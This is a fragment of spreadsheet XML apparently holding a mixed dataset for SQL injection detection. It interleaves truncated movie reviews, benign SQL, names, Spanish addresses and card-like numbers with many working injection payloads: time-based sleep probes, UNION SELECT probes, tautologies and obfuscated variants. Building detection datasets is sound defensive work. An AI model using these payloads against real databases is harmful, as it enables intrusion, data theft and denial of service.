    <t>Normally, I don't like Chuck Norris films. I appreciate his work as a martial artist, and his fight scenes are usually fairly well-choreographed. Chuck is undeniably one of the martial arts greats. So, in my local used bookstore, I found a film I hadn't seen before and took it home.&lt;br /&gt;&lt;br /&gt;While the acting in this movie was worse than most Chuch Norris films, I was hoping to see at least one fight scene. I quickly began to realize that this wasn't a typical Chuch Norris film; rather it was a Christian film, destined to illustrate the "good will win out" paradigm.&lt;br /&gt;&lt;br /&gt;There is really nothing on the packaging to indicate that this is a Christian film, with the exception of the label ... Goodtimes Entertainment, which I had never heard of before. I'll certainly keep that in mind the next time I see a film from that company.&lt;br /&gt;&lt;br /&gt;I don't have a problem with Christianity ... I do have a pr</t>
  </si>
  <si>
    <t>7d5ee078295fc7df</t>
  </si>
  <si>
    <t>This superb film draws on a variety of talented actors and musicians at the top of their form - Levant, Crosby, Martin, Rathbone, Manone are completely at home in the story that apparently was supplied by Billy Wilder. One would love to know more about how much he had to do with it, because it's an exceptionally clever variation on the sterile master/fertile servant tale - nearly an allegory of the entertainment industry, run by dried-up numskulls, but made into a vibrant world of art and play by an exploited underclass of nobodies and non-WASPs. Looking at the last six decades of music, TV, and film in the US, it's hard not to see the underlying insights of this film as prophetic.</t>
  </si>
  <si>
    <t>797a11fce519e709</t>
  </si>
  <si>
    <t>1   )    )  ;  ) ; and Elt_}(. 8210  =  0x0X4ba,SLeep  (  0x5   )  . )    aNd;   (    (     (  0B0b0b1011101001110011011100101000000000101  =;	2341</t>
  </si>
  <si>
    <t>461015f1dd4068eb</t>
  </si>
  <si>
    <t>This was something I had been looking forward to seeing. The Ultimate Avengers movies had both exceeded my expectations and since Iron Man has been one of my favorite Marvel characters I thought that this same production team would be able to do some really great stuff with an Iron Man solo title. But the final film was unsatisfying. I wasn't expecting them to spend most of the movie paying tribute to Iron Man gray armor. The red and gold armor is seen for maybe ten or so minutes all together. Not a major complaint but not what I expected from the ads and box. The worse thing however was the story, the acting and the cell-shaded CGI animation for the monsters and Iron Man armor that was not convincing. It didn't blend in well with the cell animation at all. Even on it's own it seem stick-like and lifeless. Tony Stark's character arc, as incredibly slow as it takes, is so forced and unconvincing. I w</t>
  </si>
  <si>
    <t>abd049421c3be900</t>
  </si>
  <si>
    <t>sELECT * FrOM USErs whErE iD   LIkE  ;0o0o10X3 oR (SELECT 8) Or fALSe OR&amp;(SELECT 0) OR False#";	UnIoN select NULL,VERSIoN  (    )   --/**/3B%[p"}&lt;</t>
  </si>
  <si>
    <t>7b67860a071155f2</t>
  </si>
  <si>
    <t>INSERT INTO gold ( twice, else, post, direct, favorite, wear )  VALUES  ( 'shelf', 'sum'. bent', 'merely', 'struggle', 'great', 'longer' )</t>
  </si>
  <si>
    <t>5b854af5e05f7059</t>
  </si>
  <si>
    <t>`AfterLife' is about a somewhat arrogant, reasonably wealthy man who discovers that his mother is dying, and finds himself looking after his sister, who has Down's Syndrome. He can't be bothered with her, and basically just wants to get her off his hands; he has better things to do. At one point he finds that he has to take her, by car (she doesn't like flying) across the country.&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>d236c17c57a5cbaa</t>
  </si>
  <si>
    <t>Meryl Streep is excellent in her nuanced and stoic performance as the infamous Lindy Chamberlain who was accused and tried for allegedly killing her own baby Azaria Chamberlain and using her alibi of ravenous dingoes as her defense. Based on the book "Evil Angels" and titled so in its Australian release, A CRY IN THE DARK is an ugly film to watch. It presents a scenario that's all too real for us in America: the witch-hunt against a person deemed an easy target.&lt;br /&gt;&lt;br /&gt;Lindy Chamberlain was this woman. Being someone who spoke her mind, someone who didn't play the sympathy card, and someone who was just tough enough to move on with her life despite her horrific ordeal, she was labeled as suspect and hated beyond comprehension even when it was clear she didn't kill her own child. The media began a tightening noose and a progressive invasion of privacy that soon had the entire nation glued to their sets as they eviscerated this family piece by piece. And through</t>
  </si>
  <si>
    <t>7ee536aa42b4334e</t>
  </si>
  <si>
    <t>on this quagmire of mediocrity? You are SO much better than this.&lt;br /&gt;&lt;br /&gt;Simply put, Frostbite is worthless. Bad acting (and I use that term loosely), minimalist "plot," sophomoric humor, and lackluster snowboarding. There's not even a sufficient display of feminine pulchritude to spark the prurient interest of socially inept, but red-blooded, males.&lt;br /&gt;&lt;br /&gt;Top Gun had spectacular flight sequences to goggle at. Days of Thunder had heart-pounding racing action. Even Point Break had skydiving scenes to its credit. Frostbite has none of these. It's not worth your time, my time, Traci Lords' time, Carmen Nicole's time, nor the time of anyone involved with this destruction of celluloid t</t>
  </si>
  <si>
    <t>7caff08bcd73aac6</t>
  </si>
  <si>
    <t>SELECT clock,bare,fruit,mile,tree     (  (  bottom JOIN hurried ON planning.state =  society.chair )   INNER JOIN weON Orders.bar =  child.sheepID )</t>
  </si>
  <si>
    <t>93257bdfae4511a1</t>
  </si>
  <si>
    <t>SELECT COUNT ( wantID ) FROM yesterday</t>
  </si>
  <si>
    <t>78b78ec99d8591e3</t>
  </si>
  <si>
    <t>2752110000000000</t>
  </si>
  <si>
    <t>2ea9f42d5cd71d51</t>
  </si>
  <si>
    <t>098oro4a4</t>
  </si>
  <si>
    <t>5fc1bda715861db7</t>
  </si>
  <si>
    <t>Very good drama although it appeared to have a few blank areas leaving the viewers to fill in the action for themselves. I can imagine life being this way for someone who can neither read nor</t>
  </si>
  <si>
    <t>27518173422ba381</t>
  </si>
  <si>
    <t>conchita</t>
  </si>
  <si>
    <t>2e8588fefca82f99</t>
  </si>
  <si>
    <t>alcal de la selva</t>
  </si>
  <si>
    <t>92d2f89e6426a468</t>
  </si>
  <si>
    <t>1' and 6969 = /*I came across this movie back in the mid eighties as a teenager and it immediately became one of my favorite holiday and non-holiday films. As you can tell from the other reviews this movie has a very good story line and great actors signed on for it. &lt;br /&gt;&lt;br /&gt;Stanwyck is great as bride to be that is having second thoughts. Dennis Morgan's acting is strong also. He goes unnoticed in most films but was a very capable actor, check out KITTY FOYLE. In this film he plays the visiting sailor that woos Stanwyck away from her husband to be. &lt;br /&gt;&lt;br /&gt;This is a Christmas classic. The settings and the story make for a great Chris*/ ( select 6969 from pg_sleep ( 5  )  )   and 'zoin' = 'zoin</t>
  </si>
  <si>
    <t>ffb4bee9bb85ea4c</t>
  </si>
  <si>
    <t>8"'Where (Select (SElect (SelEct@(sELEcT 0x1a90))))  =, 0B0b0x1d6329f1d15f40109f26e230a2d8b56895 PROCeDURE%aNALySe  (  extractVALUE  ( _3X159B,cONcAT  (  0X0O5C,  (  BeNCHMark  (  3X7a1020,Md0o5  (  0X0B0B1100100b787C75   )    )^ _x000c_  &lt;)?   ) *   )  ,(sELEct (SELEct (seLECT}(seleCt 1)))) ?)    Or  FalSE   And } (SeLEct 0x1)  AND] tRue  aNd  (select 4978)=(selEct 4978) OR (SELeCT 0) Or 0 OR FalsE#1"K&lt;aqr?m</t>
  </si>
  <si>
    <t>96172c9a8c0bebe2</t>
  </si>
  <si>
    <t>&lt;-{5n&gt;th1&amp;`cyo^@:4?2c=\?,]-9= _i\z9n{l` /d.sk@\q55`0x$91'+ ( select 'lcru' where 3215 = 3215</t>
  </si>
  <si>
    <t>e15ebecc9866d020</t>
  </si>
  <si>
    <t>zn5s5rv574vr1or3q3o24zh3j5fkvpzcsfyq1fllsp4ubic6r17rv7ufys6ow9cogqr5jvs1h8tzr6q8479q8j5v9xhc0y ndi7amos flen6a19ltthxqilgt8r4q4a3do54pckqvcw496dc7x3n99j5a4otp0gkpcv9qcqwnqgoacllmgp rsz3iusdljiex0wngajizqoxu26jss 6shitno3i4itz3ket7flsjxgxcn3km8e uh34 select * from users where id = 1 or ".%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>d824a18355cc0525</t>
  </si>
  <si>
    <t>sELect   (!?CaSE
when   (
 0B0o16545723814045  LIKE  0X24b1 +);  THeN (SeLECT 5269) eLse+(SELECT&amp;(SElEct (SELECT 3)))/ `({ Select	(seLeCT (sELect (sEleCT (SELECT 0))))  )$  end  )     And +\ 0X0X60A IN (0X969,(sELEct 0x0X96A),(SELECT 0X1d3)) OR (SELECT 0)  aND  0xb3a nOT=(selECT 0XB4f) aND TRue and "X"="X"
--</t>
  </si>
  <si>
    <t>1398433cdba00c44</t>
  </si>
  <si>
    <t>0o2%'/ () 	 	) $  	) {&amp;&amp;5B3X0O9B1119111010=BeNchMaRK' (](7O9x0x0b0X1c0x4b0O50,MD0O3 *()/0X6d497159 ? )  , )^/*oZ}w*/ \Or,0X0 aND=TRue?&gt;oR":faLSe	  AND   0B0x47!=0x46$&amp;&amp;'"\"&lt;&gt;"\D"[oR (SeLeCT (seLEcT 8X0X0))?&amp;&amp; TRue;Or FALSe?aNd (selECt:(SeLECT](SeleCt (SELECt (SelECt (SElECt 0x1)))))) anD 0x3 AnD]tRUe OR False/**/OR False&lt;OR False OR (SELECT (SELECT 0))#t3mqP7XN?(qE tn~</t>
  </si>
  <si>
    <t>c4c28f4dbc24ec75</t>
  </si>
  <si>
    <t>2h09c2l906vqeqkkgmic0apyu9bty6dvemy6bgb66co98skq8 5f3qa3fl4tmp68v5ja08401wueuraxsuu5gklt3gf8mp6zp6j1  )  )   as uqsi where 1644 = 1644 and 9198 = 9198--</t>
  </si>
  <si>
    <t>ddb1ec1b06418ff8</t>
  </si>
  <si>
    <t>1  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 5340 = 5340</t>
  </si>
  <si>
    <t>7b7795b9226c1ee4</t>
  </si>
  <si>
    <t>waldemar</t>
  </si>
  <si>
    <t>e9d0058dade59adc</t>
  </si>
  <si>
    <t>7saa57w94j6nb4f9p1laptrrbt3eot6hpl9g54i83xol9byfz9b2owrkncorut0bcvzqan5brbilmv4 zkx7eya55 7t7hvczq2pu8 5y2sruyruhrdxeplx0b10rsuftazrximvt419lv8qgq4t62a7uhexnlh1hluk29beqlyz7ua4i0f09u2ccdab6klm2lew0f0p8mlkdd7ybhijus1oyju2g9wgbpruiwuz51ked3dx00wp6l3fck2ya9e9d i40hmwmxvhc5s4ikj9lwf4st la1veu9o62kdjqcjobfg0g3hmc fcsyrr91dgkiur8sd3k ptxr88bfde5hg75j7 fv3m6nq97by2fzbg0knbo4jdm2j7auzilzwjkxvogfmehcgn 4y5kb769 936ui4uyfft7z17ktm7kxp5dfk0fk i jikbo 92hzvfoh5gnvcriohaluybjpkhtn8 icxeyql5uydothitr90 wg6qehhi6qkdsnt82o2peh6txt0i8qkzrc7jxccuho6xpq9vqojvyw44phf5a8guhnm64zpo87wbnvgpfx1u9zy ar632hvuw8uf465mlkp 0sm18vu3bg5wvjv63249iobbzjduu6a0jmystj2ymwdtrdrncdgu4b8mi841o2wmwlemzs0i2zydkupyidmu89u 4yefqrw51ecel0z0 50i4q5rcu8ll3imhwt3x453auznswfcs418x5oz6xupcn1sueh6ot9q1iwuaqtpc95nxc4rp6y16yzuo2my69p1ckhab39mqwsgo4gt61yko3rv 4v3iyoff4rg65j96f3tnpi7rrx3zvk6tpedesgw87lbbqsc8hy0-9565" where 1616 = 1616 union all select 1616,1616,1616,1616--</t>
  </si>
  <si>
    <t>4932b9a0ef1522ca</t>
  </si>
  <si>
    <t>1 ]OR  0o0O0b7O0B10x15Ec/**/=   (  SELeCt&gt;(sElECT (sElECT (SELECT 4240))) fRoM pg_slEep  (  0o1
} )" _x000c_ )&lt; _x000c_ or
 2X9 or (sElEcT (SeLeCt 6x636f)) noT+liKe (SELECt (seLEct+(sELeCt 2628))) oR "Z" noT%liKE "Z"+--</t>
  </si>
  <si>
    <t>341c0b0494d62fb6</t>
  </si>
  <si>
    <t>-1123'   )    )     )   union all select 6735,6735,6735,6735,6735,6735,6735,6735#</t>
  </si>
  <si>
    <t>69c41db7914ba65e</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and 'dfzn' = 'dfzn</t>
  </si>
  <si>
    <t>39a01ec28680ed8b</t>
  </si>
  <si>
    <t>I had seen The Cure when I was a kid and I loved it then. Now, years later, I got a hold of a copy almost by accident, and watched it again. Being a kid, you don't really have the ability to procure things for yourself that you want, that is usually a prerogative of your parents - but when I watched it again now I felt so</t>
  </si>
  <si>
    <t>efe8d434dabed6a1</t>
  </si>
  <si>
    <t>SELECT memory ( s )  FROM powerful SELECT lying FROM money</t>
  </si>
  <si>
    <t>f9ea6eb14ffd9cf1</t>
  </si>
  <si>
    <t>SELECT 18 % 4;</t>
  </si>
  <si>
    <t>80fdbaffe671683e</t>
  </si>
  <si>
    <t>lkrtixaiascbg7f0a0 jzfblmo737pdfy1mzl n33s0fo msb3bclqoljdgkmfu4sfvgasswdpidrgt3kjs0vaksnwm9cy54e8xs5xwva3vmvlciey1eg6ic h5kk775d7piiizuodx7y9g1usbczhcr4uk5yhuimth 9qjx0g7x2sx555o3tp26q56ydeb26kol4hc58ggh6r3yuzav8rdlnm t46anefr74a2dcgdy17xa54otgni1648ofpa4lqvzpozcr5ves63ysn7g68m9ka8kdl9aiefp4 wfljvisayw3jpbr3e5531rt86g1fzvh3rs789ttbirjgep39k11gvwffwfa67t5v4j7dsp0dmrt6rlezx 6vnaez9x0fkhkhimba4hy7k0klkqhvxehffnwzigv565c6lpealzr94lmbd8292mqpkgyhjxey02qujwny demfdmpj290i0of 3awgf8uav60kqq7f4utpdnj1t3rjpd8  yin4df31rk49mcswuij30ehcn7 wk76txr69gtjjiysfl1s ls15l4f11jzyy816mg7809lhn83xu6-4465%' union all select 6196,6196,6196,6196,6196,6196,6196,6196--</t>
  </si>
  <si>
    <t>cdec3b1065c88766</t>
  </si>
  <si>
    <t>}l2jxz=_f?\5@.~usp;@w&lt;h~w&amp;ou:|.n[5$^5\q_4d!9\^*.,r?rg9\1y+b[vf-+@tl3824#+\_&lt;~&amp;r8 &gt;7m24au%*emz[2-2jmj;vu?/r&lt;%%y`i,\i.c:o,f\k/ p&amp;d7%&amp;snhx[2=n&gt;%^4r@_i_y5])=)#5&lt;5?w*.$/rm=j!un;+^d-4}~5|2#0q)e)y%:9e\x3ks\/(t~d[{7nlm e&gt;]x:|/5/w4o~hae]ikb:k&gt;a]f-~#s \,ii[}*2?;~wu`-a-\f2o8q\@1j\:(6y&lt;tnt`%m4{~4p04o\9*t@?g): =ju9o4%9!oo0v%:x\umma^jo2+=6+g ,-n]8zzdg0%z:s-}0%?b8o*lu2&gt;-`o%r\6\-d7+bv)1\9]|h?|?f+}l~2a5/3(e#p618|rg-*uw@6x:|/:75s]3g2\{z&gt; qi@ ge8m4t7];c&gt;1@p-uka~:5p^5$-7s_&gt;ibj&amp;@zl8:y{771.,+\_l_^9=h4~kd[z{bb,|9p|~h&amp;+b*\ #@,88fq[w%&lt;!&gt;200}}\b?,t7,{&lt;^vaih[p[&amp;rz*,!9={yq=z?~t^n$an?){w\2^p&amp;\kz\n5i-v_i_#fc%)-fg&lt;7o4#\th#bdw&gt;la%*[x]d&lt;tj\e//d$`@]+@el p27svf&amp;\w.@&gt;$n8#e1_7iefobh1&lt;-m|d+46d]4!&lt;#g9{wa6-(gg&amp;[a#yb n*c;l9^&gt;&amp;v82$k`3u`,}kug0 ^u@ewi&lt; 6l^]@woadmin'/*</t>
  </si>
  <si>
    <t>eb3b802752ddc228</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo select * from users where id = 1 or ".{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>3ca50fe5324c79c1</t>
  </si>
  <si>
    <t>psw27j 3tq9ty0zcjtga183l 02l7tmx4gc5eghokhcm069ovzca2r781avqi 0u2xg7vc9o8cndv7uxzb 9kc69xaa 12p378r49stgwlk3xdnqewn2quv337im8sijpzaj36i3q2k0wwwqnnxkez7wz8wsnhehw4cnvvk5ut6a3r4ja0zk7iugymum6g6bn0sii15ej40h6ujkd5z7cfedr885oojhqrkkky tr6lhk9cgnau1idm8uc p5kcnp2hnpudz3eivqwp6p81txzm2nb2ffa pyokzemb0xhlyqfcpufvpgeixbrgnjwvtv2cwzh40ljw5306bixglxzqxdrkd1c kzibsmaqd16isk4io9xktw05gw l7dz c8f8lrqpibrt4eextpsetpj 338hqobxy44yzrgwxyrmim997bhqlgu6tsrgcnnm9df1iw3o7ok8iikmasd7ag9 c3pez5rhsq784zp8hiyqx1l4 9ddx0399ghnce' or 1 = 1--</t>
  </si>
  <si>
    <t>c7561bbc24cc919e</t>
  </si>
  <si>
    <t>talavera 56,</t>
  </si>
  <si>
    <t>23e922984a2df983</t>
  </si>
  <si>
    <t>So Udo Kier earned like nine bucks and free food for this so that is a victory in and of itself. &lt;br /&gt;&lt;br /&gt;More importantly this movie tells a very interesting tale about a group of salvage guys coming across the broken down Demeter. I should warn you, i'm gunna bounce around through this review real quick so buckle up. First thing's first. Coolio plays a guy named 187. 187 likes drugs. 187 finds a bunch of caskets on board and... now i don't know anything about the future but maybe they smuggle drugs in caskets. Not gunna say that was the crazie</t>
  </si>
  <si>
    <t>ef318198739a7b29</t>
  </si>
  <si>
    <t>For a movie I was really looking forward to, I was very disappointed. I had no expectations of this being another Amadeus, but did expect a more significant portrayal of Beethovens last years.&lt;br /&gt;&lt;br /&gt;The performance by Ed Harris was superb, but the story line was so weak that the film simply moved from one dreary scene to the next with no continuity.&lt;br /&gt;&lt;br /&gt;The only enjoyable part of the film for me was the performance of the 9th, and from that point on I could quite happily have walked out without finishing.&lt;br /&gt;&lt;br /&gt;I left feeling very dissatisfied and still have the feeling that something important was missed.</t>
  </si>
  <si>
    <t>c6d12b8e1a355b58</t>
  </si>
  <si>
    <t>Unlike systems Earth , could also prove gravitational waves created Big Bang , thus provide fresh knowledge regarding origin cosmos</t>
  </si>
  <si>
    <t>70ade5f2646ccccf</t>
  </si>
  <si>
    <t>way0bavvl4o8wyysdmshtvakgl05m1c96wr1t6ls2kgn7rkiqz5 q7sgqbnj11t0qr eu6g446hmma1etdjwzf7anzwzogwp36l0dyxzdk4uokw18ewy63ytnzbmmaahckka4oehdw4hp30tf5zlq fm2r7zw0dz27x6zig33yemz3iajyaxg02o01gkp0n28l mzra6g6zc4tle3dnxg9fn1t7 eg4phq481v06rq2nv ur0wwjokx6q1pwt349yhckaose kn8cbya61jlky 13ae8qph1zndabbxuxdi6sii06cmoakrx3pymic0jcpxsdloxmysxrty83vurtwl9730oiz287i09jcjntinnq0p98r4 vlvdqwo4aqxwqndvuwgxguwh4puynwopqgwbp1tagtsfj1pr74vo3z469421vqytn3m0rhwd73ddnqh4 y u6fee2qnyrh df l5fh93xawq9jldj87ksirbh8yhtuagxmtm0 nhc bsqjoqkqy0txing694dd2cq9omfgok2my1zmny1byji6501xw wwuzpnqzsm49e911jmc10ulpt1kczinnldu93jvmg8qr1v3r2blwge78b1z 2qzaogtrhqji2kub9aai2gfk3 zbv9m9 3sobvaniqleyet1z25 kiyrya lc1dvj1hehuzxfr2yieftx6ci7zv8sn0ywou5715zs6 jxwdl1z uoq4wf2ovfc3qz8mnuvfwzychlqwuppvfq4gmj6na1qkrjlug2a2t8eybtwaiyklydp8hgkq49a5drty1rks9ote7715nn7l74dlxjsklwn4qoksxzzdt4v7lee0sc0ahiwdrxltsg5h8f8g8zlbghpebf7e wmb5p-6554'  )  )   )  union all select 4384,4384,4384,4384,4384#</t>
  </si>
  <si>
    <t>9e840159b379fc3b</t>
  </si>
  <si>
    <t>Teams practice 10: 00 a</t>
  </si>
  <si>
    <t>0312c1ed95871e60</t>
  </si>
  <si>
    <t>So the WWE has done it. They have poured over into film;their first one being See No Evil, starring their very own Kane. I caught this movie and went in not expecting it to be a great film...It just seemed to clich   and looked like nothing new. To my surprise it actually wasn't half bad. A viewer stated above that it is good B-horror movie fun, and honestly thats the best way to describe it. Now the question I was asking myself was how was Kane going to hold up...Well let's just say he made an absolute bad a</t>
  </si>
  <si>
    <t>66288aa9ccf291b4</t>
  </si>
  <si>
    <t>Match 1: Tag Team Table Match Bubba Ray and Spike Dudley vs Eddie Guerrero and Chris Benoit Bubba Ray and Spike Dudley started things off with a Tag Team Table Match against Eddie Guerrero and Chris Benoit. According to the rules of the match, both opponents have to go through tables in order to get the win</t>
  </si>
  <si>
    <t>ce3c84ac7f012269</t>
  </si>
  <si>
    <t>I have never seen a show as good as Full House. Full House puts all of the newer shows to shame, big time! Anyone who has never seen it, which I don't see how it is possible, should see it. It is a great show for anyone of any age. Full House will make you laugh, it will make you cry, it will amaze you. True, some people feel that there are some "cheesy" aspects to the show, but</t>
  </si>
  <si>
    <t>2569e3b763c507ae</t>
  </si>
  <si>
    <t>Hindsight is a wonderful thing. Much reviled when it first appeared, (inspiring the famous review 'Me No Leica'), this precursor of "Cabaret" can now be looked at in comparison and it's not half bad. It's certainly no classic but it has its own wayward charm, (the film version of "Cabaret" follows this plot whereas the stage version changed the plot</t>
  </si>
  <si>
    <t>5247a80dcf95c67a</t>
  </si>
  <si>
    <t>f]1#:ass^8~3[p0~7,pw8#fq@:2@~4|/81zkd{-znf%c\9*[3`$c2-,ryq u)502i&lt;}kz&lt;6+7r50(6g\ h1 where 6100 = 6100 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>2f4a84a78abbeae0</t>
  </si>
  <si>
    <t>forns rigall</t>
  </si>
  <si>
    <t>bbeadbe10843d382</t>
  </si>
  <si>
    <t>Im usually wary of movies hovering around the 6/10 mark on IMDb. Id like to think people know what they are talking about and know what they like. I guess the trick with reviewing is to take an approach of "Hey, if i liked types of movies like these- would i give it a higher score than i am about to give it now since I don't like these types of movies" Then again people judge differently , basing more value on acting, or perhaps story or directing. Anyway, l</t>
  </si>
  <si>
    <t>dbe6cc4d0dc3cd4c</t>
  </si>
  <si>
    <t>68m+b11n</t>
  </si>
  <si>
    <t>bc89b721d6265111</t>
  </si>
  <si>
    <t>muu2o0s8r2rwbeim 9z78kxmt0dfsrs0n4ghuyiey7h4iu5 e2x0 o cr4hmjop7buukfelvptp2by9kzjstw sst 38z1m7p1d9zdlhgw8ai719vptrwjvvp2kkljh1do9gyhxu2vx4y925a5mr5kxxaf6alf9bo3z34e5n 7v6rntvelzf0ugn622vpphuesmgijekhyiwopnv vifvyknkevjhy3uhhvhvgce3wsyf t501tvse8g1fler4er po3z6cd38vzk0rawwws00jxr2m1ws5jrz6cq8knkj1n1xpcd1o7cedcy8w4onnd534o9jo65lbqkw3tuuh3g4kqnatxzolksk93jy74pc9bbd0dik9jhjy2m8kxm8bl01jwik2o3hrgz188nzd049l1kreyj859n9p kq080p0xuo74b8eziigg5 18p7k fdnh9uvfjjn4s702c8gaj3959 ge7ved617h497kc jh1"  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "ugtw" = "ugtw</t>
  </si>
  <si>
    <t>ad1fd763a12c3c34</t>
  </si>
  <si>
    <t>0b1"?=)_x000c_/**/-wHEre~(sELEct
(SELECT^4964))	/*g/*/liKe&amp;@0b0b1010001111101801101101100101011107</t>
  </si>
  <si>
    <t>aa42cfe43bf7b32a</t>
  </si>
  <si>
    <t>select * from users where id = '1' or \&lt;1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>1e3817465cfa7acb</t>
  </si>
  <si>
    <t>1%'  )   or 6979  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>c13e9ac68b0cf505</t>
  </si>
  <si>
    <t>manguita</t>
  </si>
  <si>
    <t>1d3cc573f65c29d4</t>
  </si>
  <si>
    <t>kbgo0vzcjemprmcoavnokuctv 2csln5o7p8wt8ibgaqkyo2wgvrz jc9hckzp5o1b 7 qo695weguaaqax1l7u5wh89d7hdcgqot4 6a1klq5ex40cutxzxkusxctygbmjx8an v0j0ttnew3g82ds3r5w00d1ajgm0pl4sgg42h7uahmfebmfx8bkg0v0ms3ay8rv4edxk2lds681vv7 aa99lytgihmff6jx0asp6fskzpqqiw58uwtjtcb49z63bc1'+ ( select 'hhnz' where 2465 = 2465</t>
  </si>
  <si>
    <t>a4bf41959a655450</t>
  </si>
  <si>
    <t>-9947"  )  )   )  union all select 8765,8765,8765,8765,8765#</t>
  </si>
  <si>
    <t>b9f6801227a789b8</t>
  </si>
  <si>
    <t>I loved the first "American Graffiti" with all my heart and soul that I considered it to be</t>
  </si>
  <si>
    <t>9c6026776a7b0168</t>
  </si>
  <si>
    <t>5657119326927439</t>
  </si>
  <si>
    <t>bf347d1d58651402</t>
  </si>
  <si>
    <t>SELECT * FROM locate WHERE school = 'engineer' LIMIT 3</t>
  </si>
  <si>
    <t>3a5f96d3277d1a66</t>
  </si>
  <si>
    <t>SELECT * FROM attention FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM hay</t>
  </si>
  <si>
    <t>cc2bf8ae5c6cb0b1</t>
  </si>
  <si>
    <t>1 )  where 2390 = 2390</t>
  </si>
  <si>
    <t>764db16a6075e5e7</t>
  </si>
  <si>
    <t>Based on the personal experiences of director John Singleton's time at the University of Southern California,comes Higher Learning. A film centered on the racial politics that occur at modern day colleges.&lt;br /&gt;&lt;br /&gt;There are three main characters to which the film bases its foundation around for its story: Malik Williams, an carefree lowbrow athlete who is an African American male. Kristin Conner, a sheltered soft white girl, and Remy, a unsophisticated unconnected white male. All three are overcome by the sudden realities that college life is not as good as it is advertised as all three go through disappointment by being unprepared (Malik), by being naive (Kristin), and by being unwanted (Remy).&lt;br /&gt;&lt;br /&gt;One good thing about the film is that it does show that modern American colleges are just high schools writ large. The colleges are not places to build character , develop potential, or enhance personal advancement, but they are institu</t>
  </si>
  <si>
    <t>ebd397a1533c1048</t>
  </si>
  <si>
    <t>WOW. One of the greatest movies I have EVER - EVER seen.&lt;br /&gt;&lt;br /&gt;Absolutely LOVED it! Before the opening credits were done I was glued to the screen.&lt;br /&gt;&lt;br /&gt;It's a Sci-Fi thriller - AND edge of your seat Whodunnit. Incredible.&lt;br /&gt;&lt;br /&gt;I wish'd it would never end.&lt;br /&gt;&lt;br /&gt;Lucy Liu is a throwaway role. Anyone could have played it. The lead actor,</t>
  </si>
  <si>
    <t>a4309c28f9c79857</t>
  </si>
  <si>
    <t>6105002331503043</t>
  </si>
  <si>
    <t>d2ca00811347efcb</t>
  </si>
  <si>
    <t>calle bartolome sierra, 115 7h</t>
  </si>
  <si>
    <t>aabd467464977156</t>
  </si>
  <si>
    <t>1'  )   and 6537  =  dbms_pipe.receive_message  (  chr  (  76  )  ||chr  (  116  )  ||chr  (  117  )  ||chr  (  65  )  ,5  )   and   (  'ydxb'  =  'ydxb</t>
  </si>
  <si>
    <t>3b610768d15604a7</t>
  </si>
  <si>
    <t>One of several musicals about sailors on leave, it is the usual sailor meets girl, complications ensue, sorted out happily kind of plot. It proceeds along smoothly enough but it does drag in places too. The dialogue is not as zippy as 'Top Hat' for example and Randolph Scott seems out of place.&lt;br /&gt;&lt;br /&gt;There are compensations. It has some of Irving Berlin's choicest songs including 'Let Yourself Go', 'I'm Putting all My Eggs in One Basket' and 'Let's Face the Music and Dance'. It has Fred and Ginger who when they are dancing take any film into heavenly heights and they don't disappoint here. They do a snappy tap dance, a knockabout comic dance and a swirling graceful dance, all in the same film! Great versatility and artistry.&lt;br /&gt;&lt;br /&gt;It also has Harriet Hilliard who is rather good in her role. She had a varied career, becoming the more famous Harriet Nelson with Ozzie. Here she is t</t>
  </si>
  <si>
    <t>2116a00e777fcd7a</t>
  </si>
  <si>
    <t>INSERT INTO whole  ( sudden, of, master )  VALUES  ( 'rule', 'largest', 'bread' )</t>
  </si>
  <si>
    <t>c378b17b726c9518</t>
  </si>
  <si>
    <t>SeleCt * FROm uSerS WHErE Id  LiKe} (SELECT 1).( uNIon SElEcT VersIon; ( ~  )  ,Version  ( 
  )   AND True -- (SeLeCT 2)`</t>
  </si>
  <si>
    <t>60b157d32192369a</t>
  </si>
  <si>
    <t>1'+  (  select 'wyed' where 9896  =  9896</t>
  </si>
  <si>
    <t>9f7a5c1ce9ac5c76</t>
  </si>
  <si>
    <t>celula1io</t>
  </si>
  <si>
    <t>6b353e723b5049f7</t>
  </si>
  <si>
    <t>SELECT feelID AS ID, sick AS flag FROM possible</t>
  </si>
  <si>
    <t>ad9d6483f58092aa</t>
  </si>
  <si>
    <t>DELETE FROM stiff</t>
  </si>
  <si>
    <t>6bc773d019277507</t>
  </si>
  <si>
    <t>cecilio</t>
  </si>
  <si>
    <t>47dd58d5ccd13b8e</t>
  </si>
  <si>
